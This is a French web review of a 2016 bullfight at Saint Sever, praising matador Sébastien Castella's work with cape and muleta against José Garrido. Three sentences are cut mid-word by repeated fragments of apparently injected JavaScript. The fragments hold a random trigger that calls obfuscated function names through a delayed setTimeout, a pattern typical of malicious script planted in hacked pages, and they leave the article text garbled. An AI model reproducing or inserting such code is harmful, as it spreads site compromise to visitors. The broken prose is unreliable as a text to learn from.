SUBJUGUÉS PAR LE TEMPLE

Saint Sever, dimanche 26 juin 2016. A part Bayonne en fin de saison dernière, Sébastien Castella n’était pas revenu dans les autres arènes du sud ouest depuis deux ans. Incroyable mais vrai. A Saint Sever, en mano a mano avec José Garrido, il a donné une leçon de tauromachie, de ce qu’est une grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande figura. Avec cette saveur que confère l’expérience et ce courage qui ne s’amenuise pas avec le temps. Il a torée lentement, tout en cadence, à la réception de ses trois toros à la cape.

Il y eut des véroniques au ralenti et des conclusions de passes de cape exquises. Son toreo à la cape a acquis une autre dimension ces derniers temps. Avec la muleta, il a aimanté les regards à tout moment, ceux du public mais aussi ceux des toros, avec ce sens scénique que détient Sébastien et ce relâchement qui est le patrimoine des maestros. Sa grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande faena a été réalisée face à son troisième toro, initiée au centre de l’arène et absolument pas répétitive. Il y a eu de la profondeur dans ses passes, se délectant de bon nombre d’entre elles, sans le moindre accroc et certaines d’entre elles avec la ceinture cassée en prolongeant au maximum la charge du toro. La muleta toujours lisse, impeccable, et le tracé lent, parfois d’un relâchement total. Il acheva la faena avec des manoletinas, très serrées, en se jouant la peau. On a vu un grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and Castella ce qui nous augure de belles prestations cette été dans le sud ouest.

José Garrido s’est montré bouillonnant, vibrant, vaillant et il a plu au public qui lui remit trois généreuses oreilles. Il a très bien tué les toros auxquels il les a coupées.

Bonne corrida de El Pilar, bien présenté, avec trois toros notoires.

Les commentaires sont fermés.